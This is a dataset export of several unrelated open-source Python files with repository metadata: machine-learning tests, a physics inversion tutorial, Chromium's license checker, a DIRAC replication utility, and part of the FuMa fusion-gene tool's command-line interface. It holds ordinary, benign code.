text
stringlengths
12
1.05M
repo_name
stringlengths
5
86
path
stringlengths
4
191
language
stringclasses
1 value
license
stringclasses
15 values
size
int32
12
1.05M
keyword
listlengths
1
23
text_hash
stringlengths
64
64
''' sbclearn (c) University of Manchester 2017 sbclearn is licensed under the MIT License. To view a copy of this license, visit <http://opensource.org/licenses/MIT/>. @author: neilswainston ''' # pylint: disable=invalid-name # pylint: disable=no-member # pylint: disable=wrong-import-order import unittest from keras.layers import Dense from keras.models import Sequential from keras.utils import to_categorical from keras.wrappers.scikit_learn import KerasRegressor from sklearn import metrics, model_selection from sklearn.datasets.samples_generator import make_blobs from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from gg_learn.keras import Classifier import numpy as np import pandas as pd # from sklearn.metrics import confusion_matrix class TestClassifier(unittest.TestCase): '''Tests the Classifier class.''' def test_classify(self): '''Tests the classify method.''' centers = 5 x_data, y_data = make_blobs(n_samples=1000, centers=centers, n_features=3, cluster_std=1.0, random_state=0) y_data = to_categorical(y_data, num_classes=centers) x_train, x_test, y_train, y_test = \ model_selection.train_test_split(x_data, y_data, test_size=0.2) classifier = Classifier(x_train, y_train) classifier.train() y_pred = classifier.predict(x_test) y_pred = np.array([[round(val) for val in pred] for pred in y_pred]) # print confusion_matrix(y_test, y_pred) self.assertTrue(metrics.accuracy_score(y_test, y_pred) > 0.9) class TestRegressor(unittest.TestCase): '''Tests the Regressor class.''' def test_regression(self): '''Tests the regression method.''' df = pd.read_csv('housing.csv', delim_whitespace=True, header=None) dataset = df.values x_data = dataset[:, 0:-1] y_data = dataset[:, -1] # create model # evaluate model with standardized dataset regressor = KerasRegressor( build_fn=get_model, nb_epoch=100, batch_size=5) kfold = KFold(n_splits=5) results = cross_val_score(regressor, x_data, y_data, cv=kfold) print('Results: %.2f (%.2f) MSE' % (results.mean(), results.std())) self.assertTrue(results.mean() > 40) def get_model(): '''Gets model.''' model = Sequential() model.add(Dense(64, input_dim=13, kernel_initializer='normal', activation='relu')) model.add(Dense(1, kernel_initializer='normal')) # Compile model model.compile(loss='mean_squared_error', optimizer='adam') return model
synbiochem/synbiochem-learn
gg_learn/keras/test/test_utils.py
Python
mit
2,824
[ "VisIt" ]
9cbb38deabcd79ace4e3fdede01a6647ee93237ce11577523a02a5cb128b9425
from disco.test import TestCase, TestJob class RawJob(TestJob): @staticmethod def map(e, params): yield 'raw://%s' % e, '' class RawTestCase(TestCase): def runTest(self): input = ['raw://eeny', 'raw://meeny', 'raw://miny', 'raw://moe'] self.job = RawJob().run(input=input) self.assertEqual(sorted(self.results(self.job)), sorted((i, '') for i in input))
scrapinghub/disco
tests/test_raw.py
Python
bsd-3-clause
426
[ "MOE" ]
f02662e8fecee4f5ff16d3154701bc6cf39f14d304541f7f755412216d1a9f14
# encoding: utf-8 # # Copyright (C) 2013-2015 RoboIME # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # """ General options during execution """ #Position Log filename. Use None to disable. position_log_filename = "math/pos_log.txt" #position_log_filename = None #Command and Update Log filename. Use None to disable. cmdupd_filename = "math/commands.txt" #cmdupd_filename = None #Gaussian noise addition variances noise_var_x = 3.E-5 noise_var_y = 3.E-5 noise_var_angle = 1. # Process error estimate. The lower (higher negative exponent), more the filter # becomes like a Low-Pass Filter (higher confidence in the model prediction). Q = 1e-5 # Measurement error variances (for the R matrix). # The higher (lower negative exponent), more the filter becomes like a # Low-Pass Filter (higher possible measurement error). R_var_x = 3.E-5 R_var_y = 3.E-5 R_var_angle = 1e-5
roboime/pyroboime
roboime/options.py
Python
agpl-3.0
1,335
[ "Gaussian" ]
962174babc3b9ebb750f89abdd7a099e4ee9e945a98ba0405d7cb60f53618ea1
# To run this, install Python and make sure it is in your path # environment variable, and then run it from the command line # as # # python vs3tovtk.py input.vs3 output.vtk # # This script should work with Python 2.7+ and 3+ # import sys import os import vs3 fperr = sys.stderr if not len(sys.argv) in [2,3]: # Require 2 or 3 arguments sys.exit('usage: python vs3tovtk.py <VS3 file> [VTK file]') # Use exception handling to handle bad file name input try: infile = open(sys.argv[1],'r') except IOError: sys.exit('Failed to open input file "%s"' % sys.argv[1]) if len(sys.argv) == 3: outname = sys.argv[2] else: basename = os.path.splitext(sys.argv[1])[0] outname = basename + '.vtk' try: outfile = open(outname,'w') except IOError: sys.exit('Failed to open output file "%s"' % outname) # Read in the VS3 file vs3data = vs3.Data.load(infile,stringData=True) infile.close() # Write the VTK file vs3data.writeVTK(outfile) outfile.close() # Write out the stats fperr.write('Summary of input file "%s":\n' % sys.argv[1]) fperr.write(' %d vertices\n' % vs3data.nvertices()) fperr.write(' %d surfaces\n' % vs3data.nsurfaces()) #print(' %d regular' % stats['S']) #print(' %d mask' % stats['M']) #print(' %d null' % stats['N']) #print(' %d obstructing' % stats['O'])
jasondegraw/View3D-Resources
scripts/vs3tovtk.py
Python
gpl-3.0
1,318
[ "VTK" ]
02e156d93d7c20abaad00ce9d08c64d82a0cedca324e241e98b6a9179f85d72a
""" Linear Least-Squares Inversion ============================== Here we demonstrate the basics of inverting data with SimPEG by considering a linear inverse problem. We formulate the inverse problem as a least-squares optimization problem. For this tutorial, we focus on the following: - Defining the forward problem - Defining the inverse problem (data misfit, regularization, optimization) - Specifying directives for the inversion - Recovering a set of model parameters which explains the observations """ ######################################################################### # Import Modules # -------------- # import numpy as np import matplotlib.pyplot as plt from discretize import TensorMesh from SimPEG import ( simulation, maps, data_misfit, directives, optimization, regularization, inverse_problem, inversion, ) # sphinx_gallery_thumbnail_number = 3 ############################################# # Defining the Model and Mapping # ------------------------------ # # Here we generate a synthetic model and a mappig which goes from the model # space to the row space of our linear operator. # nParam = 100 # Number of model paramters # A 1D mesh is used to define the row-space of the linear operator. mesh = TensorMesh([nParam]) # Creating the true model true_model = np.zeros(mesh.nC) true_model[mesh.vectorCCx > 0.3] = 1.0 true_model[mesh.vectorCCx > 0.45] = -0.5 true_model[mesh.vectorCCx > 0.6] = 0 # Mapping from the model space to the row space of the linear operator model_map = maps.IdentityMap(mesh) # Plotting the true model fig = plt.figure(figsize=(8, 5)) ax = fig.add_subplot(111) ax.plot(mesh.vectorCCx, true_model, "b-") ax.set_ylim([-2, 2]) ############################################# # Defining the Linear Operator # ---------------------------- # # Here we define the linear operator with dimensions (nData, nParam). In practive, # you may have a problem-specific linear operator which you would like to construct # or load here. # # Number of data observations (rows) nData = 20 # Create the linear operator for the tutorial. The columns of the linear operator # represents a set of decaying and oscillating functions. jk = np.linspace(1.0, 60.0, nData) p = -0.25 q = 0.25 def g(k): return np.exp(p * jk[k] * mesh.vectorCCx) * np.cos( np.pi * q * jk[k] * mesh.vectorCCx ) G = np.empty((nData, nParam)) for i in range(nData): G[i, :] = g(i) # Plot the columns of G fig = plt.figure(figsize=(8, 5)) ax = fig.add_subplot(111) for i in range(G.shape[0]): ax.plot(G[i, :]) ax.set_title("Columns of matrix G") ############################################# # Defining the Simulation # ----------------------- # # The simulation defines the relationship between the model parameters and # predicted data. # sim = simulation.LinearSimulation(mesh, G=G, model_map=model_map) ############################################# # Predict Synthetic Data # ---------------------- # # Here, we use the true model to create synthetic data which we will subsequently # invert. # # Standard deviation of Gaussian noise being added std = 0.01 np.random.seed(1) # Create a SimPEG data object data_obj = sim.make_synthetic_data(true_model, relative_error=std, add_noise=True) ####################################################################### # Define the Inverse Problem # -------------------------- # # The inverse problem is defined by 3 things: # # 1) Data Misfit: a measure of how well our recovered model explains the field data # 2) Regularization: constraints placed on the recovered model and a priori information # 3) Optimization: the numerical approach used to solve the inverse problem # # Define the data misfit. Here the data misfit is the L2 norm of the weighted # residual between the observed data and the data predicted for a given model. # Within the data misfit, the residual between predicted and observed data are # normalized by the data's standard deviation. dmis = data_misfit.L2DataMisfit(simulation=sim, data=data_obj) # Define the regularization (model objective function). reg = regularization.Tikhonov(mesh, alpha_s=1.0, alpha_x=1.0) # Define how the optimization problem is solved. opt = optimization.InexactGaussNewton(maxIter=50) # Here we define the inverse problem that is to be solved inv_prob = inverse_problem.BaseInvProblem(dmis, reg, opt) ####################################################################### # Define Inversion Directives # --------------------------- # # Here we define any directiveas that are carried out during the inversion. This # includes the cooling schedule for the trade-off parameter (beta), stopping # criteria for the inversion and saving inversion results at each iteration. # # Defining a starting value for the trade-off parameter (beta) between the data # misfit and the regularization. starting_beta = directives.BetaEstimate_ByEig(beta0_ratio=1e-4) # Setting a stopping criteria for the inversion. target_misfit = directives.TargetMisfit() # The directives are defined as a list. directives_list = [starting_beta, target_misfit] ##################################################################### # Setting a Starting Model and Running the Inversion # -------------------------------------------------- # # To define the inversion object, we need to define the inversion problem and # the set of directives. We can then run the inversion. # # Here we combine the inverse problem and the set of directives inv = inversion.BaseInversion(inv_prob, directives_list) # Starting model starting_model = np.zeros(nParam) # Run inversion recovered_model = inv.run(starting_model) ##################################################################### # Plotting Results # ---------------- # # Observed versus predicted data fig, ax = plt.subplots(1, 2, figsize=(12 * 1.2, 4 * 1.2)) ax[0].plot(data_obj.dobs, "b-") ax[0].plot(inv_prob.dpred, "r-") ax[0].legend(("Observed Data", "Predicted Data")) # True versus recovered model ax[1].plot(mesh.vectorCCx, true_model, "b-") ax[1].plot(mesh.vectorCCx, recovered_model, "r-") ax[1].legend(("True Model", "Recovered Model")) ax[1].set_ylim([-2, 2])
simpeg/simpeg
tutorials/02-linear_inversion/plot_inv_1_inversion_lsq.py
Python
mit
6,216
[ "Gaussian" ]
98ac15079bb8fc70123a8d7d4f2df6fe9b0590232c4bb63fc817b5078c810075
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Makes sure that all files contain proper licensing information.""" import optparse import os.path import subprocess import sys def PrintUsage(): print """Usage: python checklicenses.py [--root <root>] [tocheck] --root Specifies the repository root. This defaults to "../.." relative to the script file. This will be correct given the normal location of the script in "<root>/tools/checklicenses". --ignore-suppressions Ignores path-specific license whitelist. Useful when trying to remove a suppression/whitelist entry. tocheck Specifies the directory, relative to root, to check. This defaults to "." so it checks everything. Examples: python checklicenses.py python checklicenses.py --root ~/chromium/src third_party""" WHITELISTED_LICENSES = [ 'Apache (v2.0)', 'Apache (v2.0) BSD (2 clause)', 'Apache (v2.0) GPL (v2)', 'Apple MIT', # https://fedoraproject.org/wiki/Licensing/Apple_MIT_License 'APSL (v2)', 'APSL (v2) BSD (4 clause)', 'BSD', 'BSD (2 clause)', 'BSD (2 clause) MIT/X11 (BSD like)', 'BSD (3 clause)', 'BSD (3 clause) GPL (v2)', 'BSD (3 clause) ISC', 'BSD (3 clause) LGPL (v2 or later)', 'BSD (3 clause) LGPL (v2.1 or later)', 'BSD (3 clause) MIT/X11 (BSD like)', 'BSD (4 clause)', 'BSD-like', # TODO(phajdan.jr): Make licensecheck not print BSD-like twice. 'BSD-like MIT/X11 (BSD like)', 'BSL (v1.0)', 'GPL (v2 or later) with Bison parser exception', 'GPL (v2 or later) with libtool exception', 'GPL (v3 or later) with Bison parser exception', 'GPL with Bison parser exception', 'ISC', 'LGPL', 'LGPL (v2)', 'LGPL (v2 or later)', 'LGPL (v2.1)', 'LGPL (v3 or later)', # TODO(phajdan.jr): Make licensecheck convert that comma to a dot. 'LGPL (v2,1 or later)', 'LGPL (v2.1 or later)', 'MPL (v1.0) LGPL (v2 or later)', 'MPL (v1.1)', 'MPL (v1.1) BSD-like', 'MPL (v1.1) BSD-like GPL (unversioned/unknown version)', 'MPL (v1.1,) BSD (3 clause) GPL (unversioned/unknown version) ' 'LGPL (v2.1 or later)', 'MPL (v1.1) GPL (unversioned/unknown version)', 'MPL (v2.0)', # TODO(phajdan.jr): Make licensecheck not print the comma after 1.1. 'MPL (v1.1,) GPL (unversioned/unknown version) LGPL (v2 or later)', 'MPL (v1.1,) GPL (unversioned/unknown version) LGPL (v2.1 or later)', 'MIT/X11 (BSD like)', 'Ms-PL', 'Public domain', 'Public domain BSD', 'Public domain BSD (3 clause)', 'Public domain BSD-like', 'Public domain LGPL (v2.1 or later)', 'libpng', 'zlib/libpng', 'SGI Free Software License B', 'University of Illinois/NCSA Open Source License (BSD like)', ] PATH_SPECIFIC_WHITELISTED_LICENSES = { 'base/hash.cc': [ # http://crbug.com/98100 'UNKNOWN', ], 'base/third_party/icu': [ # http://crbug.com/98087 'UNKNOWN', ], # http://code.google.com/p/google-breakpad/issues/detail?id=450 'breakpad/src': [ 'UNKNOWN', ], 'chrome/common/extensions/docs/examples': [ # http://crbug.com/98092 'UNKNOWN', ], 'chrome/test/data/gpu/vt': [ 'UNKNOWN', ], 'chrome/test/data/layout_tests/LayoutTests': [ 'UNKNOWN', ], 'courgette/third_party/bsdiff_create.cc': [ # http://crbug.com/98095 'UNKNOWN', ], 'data/mozilla_js_tests': [ 'UNKNOWN', ], 'data/page_cycler': [ 'UNKNOWN', 'GPL (v2 or later)', ], 'data/tab_switching': [ 'UNKNOWN', ], 'googleurl': [ # http://code.google.com/p/google-url/issues/detail?id=15 'UNKNOWN', ], 'native_client': [ # http://crbug.com/98099 'UNKNOWN', ], 'native_client/toolchain': [ 'BSD GPL (v2 or later)', 'BSD (2 clause) GPL (v2 or later)', 'BSD (3 clause) GPL (v2 or later)', 'BSL (v1.0) GPL', 'BSL (v1.0) GPL (v3.1)', 'GPL', 'GPL (unversioned/unknown version)', 'GPL (v2)', 'GPL (v2 or later)', 'GPL (v3.1)', 'GPL (v3 or later)', ], 'net/tools/spdyshark': [ 'GPL (v2 or later)', 'UNKNOWN', ], 'third_party/WebKit': [ 'UNKNOWN', ], 'third_party/WebKit/Websites/webkit.org/blog/wp-content/plugins/' 'akismet/akismet.php': [ 'GPL (v2 or later)' ], 'third_party/WebKit/Source/JavaScriptCore/tests/mozilla': [ 'GPL', 'GPL (v2 or later)', 'GPL (unversioned/unknown version)', ], 'third_party/active_doc': [ # http://crbug.com/98113 'UNKNOWN', ], # http://code.google.com/p/angleproject/issues/detail?id=217 'third_party/angle': [ 'UNKNOWN', ], 'third_party/bsdiff/mbsdiff.cc': [ 'UNKNOWN', ], 'third_party/bzip2': [ 'UNKNOWN', ], # http://crbug.com/222828 # http://bugs.python.org/issue17514 'third_party/chromite/third_party/argparse.py': [ 'UNKNOWN', ], # Not used. http://crbug.com/156020 # Using third_party/cros_dbus_cplusplus/cros_dbus_cplusplus.gyp instead. 'third_party/cros_dbus_cplusplus/source/autogen.sh': [ 'UNKNOWN', ], # Included in the source tree but not built. http://crbug.com/156020 'third_party/cros_dbus_cplusplus/source/examples': [ 'UNKNOWN', ], 'third_party/devscripts': [ 'GPL (v2 or later)', ], 'third_party/expat/files/lib': [ # http://crbug.com/98121 'UNKNOWN', ], 'third_party/ffmpeg': [ 'GPL', 'GPL (v2)', 'GPL (v2 or later)', 'UNKNOWN', # http://crbug.com/98123 ], 'third_party/findbugs/doc': [ # http://crbug.com/157206 'UNKNOWN', ], 'third_party/freetype2': [ # http://crbug.com/177319 'UNKNOWN', ], 'third_party/gles2_book': [ # http://crbug.com/98130 'UNKNOWN', ], 'third_party/gles2_conform/GTF_ES': [ # http://crbug.com/98131 'UNKNOWN', ], 'third_party/harfbuzz': [ # http://crbug.com/98133 'UNKNOWN', ], 'third_party/hunspell': [ # http://crbug.com/98134 'UNKNOWN', ], 'third_party/hyphen/hyphen.tex': [ # http://crbug.com/157375 'UNKNOWN', ], 'third_party/iccjpeg': [ # http://crbug.com/98137 'UNKNOWN', ], 'third_party/icu': [ # http://crbug.com/98301 'UNKNOWN', ], 'third_party/jemalloc': [ # http://crbug.com/98302 'UNKNOWN', ], 'third_party/lcov': [ # http://crbug.com/98304 'UNKNOWN', ], 'third_party/lcov/contrib/galaxy/genflat.pl': [ 'GPL (v2 or later)', ], 'third_party/lcov-1.9/contrib/galaxy/genflat.pl': [ 'GPL (v2 or later)', ], 'third_party/libevent': [ # http://crbug.com/98309 'UNKNOWN', ], 'third_party/libjingle/source/talk': [ # http://crbug.com/98310 'UNKNOWN', ], 'third_party/libjingle/source_internal/talk': [ # http://crbug.com/98310 'UNKNOWN', ], 'third_party/libjpeg': [ # http://crbug.com/98313 'UNKNOWN', ], 'third_party/libjpeg_turbo': [ # http://crbug.com/98314 'UNKNOWN', ], 'third_party/libpng': [ # http://crbug.com/98318 'UNKNOWN', ], # The following files lack license headers, but are trivial. 'third_party/libusb/src/libusb/os/poll_posix.h': [ 'UNKNOWN', ], 'third_party/libusb/src/libusb/version.h': [ 'UNKNOWN', ], 'third_party/libusb/src/autogen.sh': [ 'UNKNOWN', ], 'third_party/libusb/src/config.h': [ 'UNKNOWN', ], 'third_party/libusb/src/msvc/config.h': [ 'UNKNOWN', ], 'third_party/libvpx/source': [ # http://crbug.com/98319 'UNKNOWN', ], 'third_party/libvpx/source/libvpx/examples/includes': [ 'GPL (v2 or later)', ], 'third_party/libwebp': [ # http://crbug.com/98448 'UNKNOWN', ], 'third_party/libxml': [ 'UNKNOWN', ], 'third_party/libxslt': [ 'UNKNOWN', ], 'third_party/lzma_sdk': [ 'UNKNOWN', ], 'third_party/mesa/MesaLib': [ 'GPL (v2)', 'GPL (v3 or later)', 'MIT/X11 (BSD like) GPL (v3 or later) with Bison parser exception', 'UNKNOWN', # http://crbug.com/98450 ], 'third_party/modp_b64': [ 'UNKNOWN', ], 'third_party/npapi/npspy/extern/java': [ 'GPL (unversioned/unknown version)', ], 'third_party/openmax_dl/dl' : [ 'Khronos Group', ], 'third_party/openssl': [ # http://crbug.com/98451 'UNKNOWN', ], 'third_party/ots/tools/ttf-checksum.py': [ # http://code.google.com/p/ots/issues/detail?id=2 'UNKNOWN', ], 'third_party/molokocacao': [ # http://crbug.com/98453 'UNKNOWN', ], 'third_party/npapi/npspy': [ 'UNKNOWN', ], 'third_party/ocmock/OCMock': [ # http://crbug.com/98454 'UNKNOWN', ], 'third_party/ply/__init__.py': [ 'UNKNOWN', ], 'third_party/protobuf': [ # http://crbug.com/98455 'UNKNOWN', ], # http://crbug.com/222831 # https://bitbucket.org/eliben/pyelftools/issue/12 'third_party/pyelftools': [ 'UNKNOWN', ], 'third_party/pylib': [ 'UNKNOWN', ], 'third_party/scons-2.0.1/engine/SCons': [ # http://crbug.com/98462 'UNKNOWN', ], 'third_party/simplejson': [ 'UNKNOWN', ], 'third_party/skia': [ # http://crbug.com/98463 'UNKNOWN', ], 'third_party/snappy/src': [ # http://crbug.com/98464 'UNKNOWN', ], 'third_party/smhasher/src': [ # http://crbug.com/98465 'UNKNOWN', ], 'third_party/speech-dispatcher/libspeechd.h': [ 'GPL (v2 or later)', ], 'third_party/sqlite': [ 'UNKNOWN', ], 'third_party/swig/Lib/linkruntime.c': [ # http://crbug.com/98585 'UNKNOWN', ], 'third_party/talloc': [ 'GPL (v3 or later)', 'UNKNOWN', # http://crbug.com/98588 ], 'third_party/tcmalloc': [ 'UNKNOWN', # http://crbug.com/98589 ], 'third_party/tlslite': [ 'UNKNOWN', ], 'third_party/webdriver': [ # http://crbug.com/98590 'UNKNOWN', ], 'third_party/webrtc': [ # http://crbug.com/98592 'UNKNOWN', ], 'third_party/xdg-utils': [ # http://crbug.com/98593 'UNKNOWN', ], 'third_party/yasm/source': [ # http://crbug.com/98594 'UNKNOWN', ], 'third_party/zlib/contrib/minizip': [ 'UNKNOWN', ], 'third_party/zlib/trees.h': [ 'UNKNOWN', ], 'tools/dromaeo_benchmark_runner/dromaeo_benchmark_runner.py': [ 'UNKNOWN', ], 'tools/emacs': [ # http://crbug.com/98595 'UNKNOWN', ], 'tools/grit/grit/node/custom/__init__.py': [ 'UNKNOWN', ], 'tools/gyp/test': [ 'UNKNOWN', ], 'tools/histograms': [ 'UNKNOWN', ], 'tools/memory_watcher': [ 'UNKNOWN', ], 'tools/playback_benchmark': [ 'UNKNOWN', ], 'tools/python/google/__init__.py': [ 'UNKNOWN', ], 'tools/site_compare': [ 'UNKNOWN', ], 'tools/stats_viewer/Properties/AssemblyInfo.cs': [ 'UNKNOWN', ], 'tools/symsrc/pefile.py': [ 'UNKNOWN', ], 'v8/test/cctest': [ # http://crbug.com/98597 'UNKNOWN', ], 'webkit/data/ico_decoder': [ 'UNKNOWN', ], } def check_licenses(options, args): # Figure out which directory we have to check. if len(args) == 0: # No directory to check specified, use the repository root. start_dir = options.base_directory elif len(args) == 1: # Directory specified. Start here. It's supposed to be relative to the # base directory. start_dir = os.path.abspath(os.path.join(options.base_directory, args[0])) else: # More than one argument, we don't handle this. PrintUsage() return 1 print "Using base directory:", options.base_directory print "Checking:", start_dir print licensecheck_path = os.path.abspath(os.path.join(options.base_directory, 'third_party', 'devscripts', 'licensecheck.pl')) licensecheck = subprocess.Popen([licensecheck_path, '-l', '100', '-r', start_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = licensecheck.communicate() if options.verbose: print '----------- licensecheck stdout -----------' print stdout print '--------- end licensecheck stdout ---------' if licensecheck.returncode != 0 or stderr: print '----------- licensecheck stderr -----------' print stderr print '--------- end licensecheck stderr ---------' print "\nFAILED\n" return 1 success = True for line in stdout.splitlines(): filename, license = line.split(':', 1) filename = os.path.relpath(filename.strip(), options.base_directory) # All files in the build output directory are generated one way or another. # There's no need to check them. if filename.startswith('out/') or filename.startswith('sconsbuild/'): continue # For now we're just interested in the license. license = license.replace('*No copyright*', '').strip() # Skip generated files. if 'GENERATED FILE' in license: continue if license in WHITELISTED_LICENSES: continue if not options.ignore_suppressions: found_path_specific = False for prefix in PATH_SPECIFIC_WHITELISTED_LICENSES: if (filename.startswith(prefix) and license in PATH_SPECIFIC_WHITELISTED_LICENSES[prefix]): found_path_specific = True break if found_path_specific: continue print "'%s' has non-whitelisted license '%s'" % (filename, license) success = False if success: print "\nSUCCESS\n" return 0 else: print "\nFAILED\n" print "Please read", print "http://www.chromium.org/developers/adding-3rd-party-libraries" print "for more info how to handle the failure." print print "Please respect OWNERS of checklicenses.py. Changes violating" print "this requirement may be reverted." return 1 def main(): default_root = os.path.abspath( os.path.join(os.path.dirname(__file__), '..', '..')) option_parser = optparse.OptionParser() option_parser.add_option('--root', default=default_root, dest='base_directory', help='Specifies the repository root. This defaults ' 'to "../.." relative to the script file, which ' 'will normally be the repository root.') option_parser.add_option('-v', '--verbose', action='store_true', default=False, help='Print debug logging') option_parser.add_option('--ignore-suppressions', action='store_true', default=False, help='Ignore path-specific license whitelist.') options, args = option_parser.parse_args() return check_licenses(options, args) if '__main__' == __name__: sys.exit(main())
loopCM/chromium
tools/checklicenses/checklicenses.py
Python
bsd-3-clause
15,806
[ "Galaxy" ]
d260e72713c00c693d688b63a5c3c76400b5ba15edab89fc3b907c7c7f4e8be2
""" Utilities to create replication transformations """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import six from DIRAC.TransformationSystem.Client.Transformation import Transformation from DIRAC import gLogger, S_OK, S_ERROR def createDataTransformation(flavour, targetSE, sourceSE, metaKey, metaValue, extraData=None, extraname='', groupSize=1, plugin='Broadcast', tGroup=None, tBody=None, enable=False, ): """Creates the replication transformation based on the given parameters. :param str flavour: Flavour of replication to create: Replication or Moving :param targetSE: Destination for files :type targetSE: python:list or str :param sourceSE: Origin of files :type sourceSE: python:list or str :param int metaKey: Meta key to identify input files :param int metaValue: Meta value to identify input files :param dict metaData: Additional meta data to use to identify input files :param str extraname: addition to the transformation name, only needed if the same transformation was already created :param int groupSize: number of files per transformation taks :param str plugin: plugin to use :param str tGroup: transformation group to set :param tBody: transformation body to set :param bool enable: if true submit the transformation, otherwise dry run :returns: S_OK (with the transformation object, if successfully added), S_ERROR """ metadata = {metaKey: metaValue} if isinstance(extraData, dict): metadata.update(extraData) gLogger.debug("Using %r for metadata search" % metadata) if isinstance(targetSE, six.string_types): targetSE = [targetSE] if isinstance(sourceSE, (list, tuple)): sourceSE = '%s' % (",".join(sourceSE)) gLogger.debug('Using plugin: %r' % plugin) if flavour not in ('Replication', 'Moving'): return S_ERROR('Unsupported flavour %s' % flavour) transVerb = {'Replication': 'Replicate', 'Moving': 'Move'}[flavour] transGroup = {'Replication': 'Replication', 'Moving': 'Moving'}[flavour] if not tGroup else tGroup trans = Transformation() transName = '%s_%s_%s' % (transVerb, str(metaValue), ",".join(targetSE)) if extraname: transName += "_%s" % extraname trans.setTransformationName(transName) description = '%s files for %s %s to %s' % (transVerb, metaKey, str(metaValue), ",".join(targetSE)) trans.setDescription(description[:255]) trans.setLongDescription(description) trans.setType('Replication') trans.setTransformationGroup(transGroup) trans.setGroupSize(groupSize) trans.setPlugin(plugin) transBody = {'Moving': [("ReplicateAndRegister", {"SourceSE": sourceSE, "TargetSE": targetSE}), ("RemoveReplica", {"TargetSE": sourceSE})], 'Replication': '', # empty body }[flavour] if tBody is None else tBody trans.setBody(transBody) trans.setInputMetaQuery(metadata) if sourceSE: res = trans.setSourceSE(sourceSE) if not res['OK']: return S_ERROR("SourceSE not valid: %s" % res['Message']) res = trans.setTargetSE(targetSE) if not res['OK']: return S_ERROR("TargetSE not valid: %s" % res['Message']) if not enable: gLogger.always("Dry run, not creating transformation") return S_OK() res = trans.addTransformation() if not res['OK']: return res gLogger.verbose(res) trans.setStatus('Active') trans.setAgentType('Automatic') gLogger.always("Successfully created replication transformation") return S_OK(trans)
yujikato/DIRAC
src/DIRAC/TransformationSystem/Utilities/ReplicationTransformation.py
Python
gpl-3.0
3,762
[ "DIRAC" ]
b31e8b60bb6ba6b65486e67934a788330e20b617b71a37313f4bb7d613ebe69c
#!/usr/bin/env python """[License: GNU General Public License v3 (GPLv3)] This file is part of FuMa. FuMa is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. FuMa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Documentation as defined by: <http://epydoc.sourceforge.net/manual-fields.html#fields-synonyms> """ import fuma import sys,argparse,textwrap,datetime def show_formats(): return """FuMa supports the following file formats: Tools | File | Format string ---------------------------------------------------------- Chimera | prettyPrint() output | chimera ChimeraScan | chimeras.bedpe | chimerascan Complete Genomics | highConfidenceJu*.tsv | complete-genomics Complete Genomics | allJunctionsBeta*.tsv | complete-genomics DeFuse | results.txt | defuse DeFuse | results.classify.txt | defuse DeFuse | results.filtered.txt | defuse EricScript | .results.total.txt | ericscript ************* Fusion Catcher | final-list_cand*.txt | fusion-catcher_final FusionMap | | fusionmap JAFFA | jaffa_results.cvs | jaffa Trinity + GMAP | | trinity-gmap OncoFuse | | oncofuse RNA STAR | Chimeric.out.junction | rna-star_chimeric SOAPFuse | final.*.for.genes.txt | soapfuse-final-gene SOAPFuse | final.*.for.trans.txt | soapfuse-final-transcript STAR Fusion | _candidates.final | star-fusion_final TopHat Fusion pre | fusions.out | tophat-fusion_pre TopHat Fusion post | potential_fusion.txt | tophat-fusion_post_potential_fusion TopHat Fusion post | result.txt | tophat-fusion_post_result TopHat Fusion post | result.html | tophat-fusion_post_result_html The file formats that are supported in the direction (5' -> 3') specific mode are: - chimerascan - defuse - fusion-catcher_final - tophat-fusion_pre - tophat-fusion_post_potential_fusion - rna-star_chimeric - soapfuse-final-gene - soapfuse-final-transcript ************* EricScript often contains entries with unknown breakpoints. Because no genomic coordinates are given those fusion genes can not be imported into FuMa and only those with breakpoints will be taken into account. """ def CLI(argv=None): """Command Line Interface base command line interface of FuMa """ parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,epilog="For more info please visit:\n<https://github.com/yhoogstrate/fuma>") parser.add_argument('-V','--version', action='version', version=textwrap.dedent("%(prog)s "+fuma.__version__+"\n\nCopyright (C) 2013-"+str(datetime.datetime.now().year)+" Youri Hoogstrate.\n\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n")) parser.add_argument('--formats', action='version', version=show_formats(), help="show accepted dataset formats") parser.add_argument("-m",'--matching-method',choices=['overlap','subset','egm'],default='subset',help='The used method to match two gene sets. Overlap matches when two gene set have one or more genes overlapping. Subset matches when one gene set is a subset of the other. EGM is exact gene matching; all genes in both sets need to be identical to match.') parser.add_argument( '--strand-specific-matching', dest='strand_specific_matching', action='store_true', help='Consider fusion genes distinct when the breakpoints have different strands: (A<-,B<-) != (->A,B<-); default') parser.add_argument('--no-strand-specific-matching', dest='strand_specific_matching', action='store_false', help='Consider fusion genes identical when the breakpoints have different strands: (A<-,B<-) == (->A,B<-)') parser.set_defaults(strand_specific_matching=True) parser.add_argument( '--acceptor-donor-order-specific-matching', dest='acceptor_donor_order_specific_matching', action='store_true', help='Consider fusion genes distinct when the donor and acceptor sites are swapped: (A,B) != (B,A)') parser.add_argument('--no-acceptor-donor-order-specific-matching', dest='acceptor_donor_order_specific_matching', action='store_false', help='Consider fusion genes identical when the donor and acceptor sites are swapped: (A,B) == (B,A); default') parser.set_defaults(acceptor_donor_order_specific_matching=False) parser.add_argument("--verbose", help="increase output verbosity", action="store_true") parser.add_argument("-a","--add-gene-annotation",help="annotation_alias:filename * file in BED format",nargs="*") parser.add_argument("-s","--add-sample",nargs="+",required=True,help="sample_alias:format:filename (available formats: %(prog)s --formats)") parser.add_argument("-l","--link-sample-to-annotation",help="sample_alias:annotation_alias",nargs="*") 